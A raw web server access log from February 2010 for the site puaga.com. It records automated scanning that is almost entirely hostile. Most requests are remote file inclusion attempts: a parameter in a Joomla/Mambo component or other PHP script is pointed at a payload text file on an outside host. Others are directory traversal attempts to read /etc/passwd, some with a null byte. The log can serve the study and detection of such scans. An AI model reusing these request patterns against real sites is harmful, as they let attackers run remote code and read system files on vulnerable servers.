70.86.5.10 - - [24/Feb/2010:08:21:31 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [24/Feb/2010:08:21:31 -0800] "GET /logs/access_100217.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [24/Feb/2010:08:21:31 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:08:22:24 -0800] "GET /logs/access_100125.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [24/Feb/2010:08:22:28 -0800] "GET /logs/access_100125.log%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [24/Feb/2010:08:22:28 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [24/Feb/2010:08:22:28 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:08:22:41 -0800] "GET /%20/inc/output/news_theme1.php?abs_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:08:22:43 -0800] "GET /%20/inc/output/news_theme1.php?abs_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:08:23:05 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mainbody.php=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:08:23:05 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mainbody.php=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:08:23:05 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mainbody.php=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [24/Feb/2010:08:23:22 -0800] "GET /logs/access_100219.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:08:24:22 -0800] "GET /bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:08:24:22 -0800] "GET /logs//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:08:24:22 -0800] "GET /logs/access_100205.log%20%20//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [24/Feb/2010:08:25:57 -0800] "GET /logs/access_100125.log%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:08:26:08 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:08:26:08 -0800] "GET /config/dbutil.bck.php?confdir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:08:26:08 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:08:26:21 -0800] "GET /bbs/bbs/good.php?board_skin_path=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:08:26:21 -0800] "GET /logs/access_100205.log%20%20//bbs/bbs/good.php?board_skin_path=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:08:26:21 -0800] "GET /logs//bbs/bbs/good.php?board_skin_path=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:08:26:50 -0800] "GET /logs/access_100203.log%20%20//bbs/bbs/good.php?board_skin_path=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [24/Feb/2010:08:27:43 -0800] "GET /logs/access_100119.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [24/Feb/2010:08:27:44 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [24/Feb/2010:08:27:44 -0800] "GET /logs/access_100217.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [24/Feb/2010:08:27:44 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [24/Feb/2010:08:27:56 -0800] "GET /logs/access_100203.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [24/Feb/2010:08:28:01 -0800] "GET /logs/components/com_phpshop/member.php?mosConfig_absolute_path=ur%20url%20spread??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
211.108.61.176 - - [24/Feb/2010:08:28:01 -0800] "GET /components/com_phpshop/member.php?mosConfig_absolute_path=ur%20url%20spread??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
211.108.61.176 - - [24/Feb/2010:08:28:02 -0800] "GET /components/com_phpshop/member.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
211.108.61.176 - - [24/Feb/2010:08:28:02 -0800] "GET /logs/components/com_phpshop/member.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:08 -0800] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:12 -0800] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:12 -0800] "GET /logs/access_100129.log///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:32 -0800] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:32 -0800] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:32 -0800] "GET /logs/access_100201.log%20%20///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:32 -0800] "GET /logs/access_100127.log%20%20///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:42 -0800] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:42 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:42 -0800] "GET /logs/access_100201.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:42 -0800] "GET /logs/access_100127.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:43 -0800] "GET /logs/access_100127.log///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:56 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:56 -0800] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:28:56 -0800] "GET /logs/access_100129.log//includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:08:29:03 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [24/Feb/2010:08:29:30 -0800] "GET /logs/access_100127.log//includes/ktedit/toolbar.php?dirDepth=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:30:54 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:30:54 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:30:54 -0800] "GET /logs/access_100206.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.180.100 - - [24/Feb/2010:08:31:11 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "puaga.com"
67.227.136.138 - - [24/Feb/2010:08:31:13 -0800] "GET /logs//index2.php?option=com_forum&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:08:31:14 -0800] "GET /index2.php?option=com_forum&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
202.160.189.248 - - [24/Feb/2010:08:32:15 -0800] "GET /orange_g/forum/viewtopic.php?p=7084 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "puaga.com"
67.227.136.138 - - [24/Feb/2010:08:33:51 -0800] "GET /logs/access_100210.log%20%20//index2.php?option=com_forum&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:33:53 -0800] "GET /errors.php?error=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:33:53 -0800] "GET /logs/errors.php?error=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:33:56 -0800] "GET /logs/access_100126.log/errors.php?error=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:08:35:43 -0800] "GET /logs/access.log%20%20//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:08:36:23 -0800] "GET /logs/access.log%20%20//bbs/bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:37:09 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:37:10 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:37:17 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.51.24.246 - - [24/Feb/2010:08:38:07 -0800] "GET /logs/access_100208.log//index2.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.51.24.246 - - [24/Feb/2010:08:38:07 -0800] "GET /logs//index2.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.51.24.246 - - [24/Feb/2010:08:38:08 -0800] "GET /index2.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:38:45 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:08:39:14 -0800] "GET /logs//index2.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:08:39:14 -0800] "GET /logs/access_100208.log//index2.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:08:39:14 -0800] "GET /index2.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:40:14 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:40:15 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:40:15 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [24/Feb/2010:08:40:56 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [24/Feb/2010:08:40:56 -0800] "GET /logs/access_100201.log//skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [24/Feb/2010:08:40:56 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:08:41:09 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_forum&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:08:41:10 -0800] "GET /logs//index.php?option=com_forum&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:41:34 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:08:42:05 -0800] "GET /logs/access_100209.log//index2.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:42:51 -0800] "GET /logs/access_100205.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:08:42:53 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:08:42:53 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:08:42:53 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:08:43:46 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:08:43:46 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:08:43:46 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:08:44:32 -0800] "GET /logs/access_100205.log//bbs/bbs/good.php?board_skin_path=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [24/Feb/2010:08:45:04 -0800] "GET /logs/access_100203.log//bbs/bbs/good.php?board_skin_path=http://felcomz.fileave.com/ld2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:08:45:06 -0800] "GET /logs/access_100205.log//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:08:45:48 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_forum&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:08:46:25 -0800] "GET /logs/access_100218.log//bbs/bbs/good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:08:46:29 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:08:47:50 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.51.24.246 - - [24/Feb/2010:08:48:30 -0800] "GET /logs/access_100209.log//index2.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:49:18 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:08:49:48 -0800] "GET /%20/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:08:49:50 -0800] "GET /%20/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:08:50:52 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:08:51:23 -0800] "GET /logs/access_100205.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:08:55:57 -0800] "GET /logs/access_100209.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:08:55:57 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:08:55:58 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [24/Feb/2010:08:57:39 -0800] "GET /logs/access_100201.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:00:03 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [24/Feb/2010:09:00:03 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://web.hufs.ac.kr/~seok/zb41/data/ypjp0/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
